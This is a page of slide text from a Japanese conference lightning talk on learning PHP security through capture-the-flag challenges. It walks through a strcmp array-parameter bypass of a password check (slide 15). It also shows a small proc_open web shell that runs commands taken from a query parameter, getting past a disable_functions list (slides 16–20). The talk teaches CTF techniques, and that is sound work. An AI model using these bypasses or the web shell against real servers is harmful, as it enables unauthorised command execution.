$30 off During Our Annual Pro Sale. View Details »

CTFで学ぶPHPセキュリティ

Ryoto Saito
March 31, 2019
Programming
3
2.9k

 CTFで学ぶPHPセキュリティ

PHPerKaigi 2019
ルーキーズLT

Ryoto Saito

March 31, 2019
Tweet

More Decks by Ryoto Saito

See All by Ryoto Saito
シェル芸のせかい / the Shellgei World
ryotosaito
2
990

Other Decks in Programming

See All in Programming
状態設計から「なんとなく」を無くそう
qnighy
63
18k
未定義動作でFizz Buzz / Undefined Fizz Buzz
kaityo256
PRO
1
440
From Spring Boot 2 to Spring Boot 3 with Java 21 and Jakarta EE
ivargrimstad
0
1.1k
Kaggle-Vesuvius-Challenge-Ink-Detection-2nd-Solution
mipypf
0
1.1k
WantedlyでFeature Storeを導入する際に考えたこと
zerebom
1
430
BigQuery のデータ品質やデータ活用を高める Dataplex 等の活用
mot_techtalk
5
1.1k
プロダクションで使うGo Pluginの利便性とパフォーマンス性 / Simplicity and Performance of Go plugin for Production
linyows
0
100
コンピュータグラフィクスの空
fadis
6
1.4k
Hono v3 and v4
yusukebe
4
2.7k
DIGGLEの分析基盤アーキテクチャ
zakky21
0
240
C++20からC++23までの変化
faithandbrave
6
7.2k
文化祭入退場システムCracker (at U-22プログラミング・コンテスト)
pocopota
0
150

Featured

See All Featured
Typedesign – Prime Four
hannesfritz
35
1.8k
The Mythical Team-Month
searls
214
41k
Web Components: a chance to create the future
zenorocha
304
41k
Building a Scalable Design System with Sketch
lauravandoore
453
32k
[Rails World 2023 - Day 1 Closing Keynote] - The Magic of Rails
eileencodes
1
900
XXLCSS - How to scale CSS and keep your sanity
sugarenia
239
1.2M
Happy Clients
brianwarren
91
6.1k
Music & Morning Musume
bryan
38
5.2k
Fontdeck: Realign not Redesign
paulrobertlloyd
74
4.7k
Understanding Cognitive Biases in Performance Measurement
bluesmoon
5
750
Designing on Purpose - Digital PM Summit 2013
jponch
108
6.2k
Principles of Awesome APIs and How to Build Them.
keavy
119
16k

Transcript

  1. CTFで学ぶ
    PHPセキュリティ
    2019/3/31
    PHPerKaigi ルーキーズLT
    Ryoto (@systemctl_ryoto)
    1

    View Slide

  2. CTF - Capture the Flag
    2

    View Slide

  3. CTF
    Capture the Flag
    ● FPSのゲームルール
    の1種
    ● 敵陣のフラッグを自陣
    に持ち帰る
    ● 由来は物理的な遊び
    ● 転じて…
    3

    View Slide

  4. CTF
    Capture
    the Flag
    ● 情報セキュリティ的に脆弱な
    「何か」が用意される
    ● その脆弱性を突いてFlagを取得
    する競技
    ※ Flag = 仮想的な機密文字列
    flag{PHP_is_s3cur3!}
    ↑過去に本当に見たことあるやつ
    ● 問題ベースで楽しくセキュリティ
    が勉強できる!
    ● 徳丸さんの挑戦状もCTF
    4

    View Slide

  5. PHPer
    チャレンジ

    シェルを
    奪えます
    ls -al /もmysqldumpも実行できる
    5

    View Slide

  6. CTFの
    主要な
    ジャンル
    厳密な分類は大会やサイトによって
    微妙に異なる
    6
    Pwn プログラムの脆弱性を突く
    Reverse リバースエンジニアリング
    Forensic パケットやFile systemなど
    Crypto 暗号解読
    Web クライアントからサーバまで

    View Slide

  7. Webの
    CTF
    情報セキュリティ的に脆弱な「何か」
    ● 「Webサイト」
    ● 「ソースコード」
    どこが脆弱かはもちろん、どこにFlag
    があるのかがわからないことも
    たのしい謎解きの始まり
    7

    View Slide

  8. CTFのPHP問題例
    - 実際の問題の一部分 -
    8

    View Slide

  9. 前提:パスワード認証のソースを入手した
    include "define.php"; /* 403 Forbidden */
    if (strcmp($_GET['password'], PASSWORD) == 0) {
    echo FLAG;
    }
    目標:なんとか突破したい!
    言語仕様に関する問題
    9

    View Slide

  10. 前提:パスワード認証のソースを入手した
    include "define.php"; /* 403 Forbidden */
    if (strcmp($_GET['password'], PASSWORD) == 0) {
    echo FLAG;
    }
    目標:なんとか突破したい!
    言語仕様に関する問題
    10

    View Slide

  11. 言語仕様に関する問題
    11

    View Slide

  12. 言語仕様に関する問題
    12

    View Slide

  13. 言語仕様に関する問題
    13
    if (strcmp($_GET['password'], PASSWORD) == 0)
    strcmpは配列や関数などを受け取るとnull+Warningを返す)
    http://localhost/dump.php?password[]=admin にアクセス↓
    array(1) { ["password"] => array(1) { [0] => string(5)
    "admin" } }

    View Slide

  14. include "define.php"; /* 403 Forbidden */
    if (strcmp($_GET['password'], PASSWORD) == 0) {
    echo FLAG;
    }
    目標:なんとか突破したい!
    先ほどのヒントを踏まえると…
    言語仕様に関する問題
    14

    View Slide

  15. include "define.php"; /* 403 Forbidden */
    if (strcmp($_GET['password'], PASSWORD) == 0) {
    echo FLAG;
    }
    目標:なんとか突破したい!
    Ans: http://target.host/?password[]=
    言語仕様に関する問題
    15

    View Slide

  16. 前提:任意の.phpファイルがUpload、実行できる脆弱性が発覚
    disable_functions
    pcntl_exec, exec, popen, passthru, shell_exec, system
    目的:シェルを奪いたい!(任意コマンドを実行したい)
    任意コード実行
    16

    View Slide

  17. (注:shell_execと等価なので`cmd`はダメ)
    任意コード実行
    17

    View Slide

  18. pcntl_exec, exec, popen, passthru, shell_exec, system...
    proc_open関数がノーマーク
    任意コード実行
    18

    View Slide

  19. pcntl_exec, exec, popen, passthru, shell_exec, system...
    proc_open関数がノーマーク
    前提:任意の.phpファイルがUpload、実行できる脆弱性が発覚
    目的:シェルを奪いたい!(任意コマンドを実行したい)
    任意コード実行
    19

    View Slide

  20. Ans. 以下のPHPファイルをアップロード
    $cmd = $_GET['cmd']
    $process = proc_open($cmd, [1=>["pipe", "w"]], $pipes);
    echo stream_get_contents($pipes[1]);
    これを1回アップロードすれば?cmd=...でやりたい放題
    任意コード実行
    20

    View Slide

  21. CTFに興味が湧いてきた人は!
    21

    View Slide

  22. やってみよう!
    22
    常設CTF(Web・PHP問題が入門から充実している)
    ● https://www.root-me.org/en/Challenges/Web-Server/
    ● http://websec.fr/
    ※ 垢登録するときは捨てパスワードを使いましょう
    慣れたらコンテストに参加!
    ● https://ctftime.org

    View Slide

  23. 困ったときは
    23
    CTFでは解答例のことを
    Write-up
    と呼びます。
    考えてもわからなかったら答えを探すのもあり!
    ("Write-up"で検索して問題を探す荒技もあり)

    View Slide

  24. Thank you!
    @systemctl_ryoto
    24

    View Slide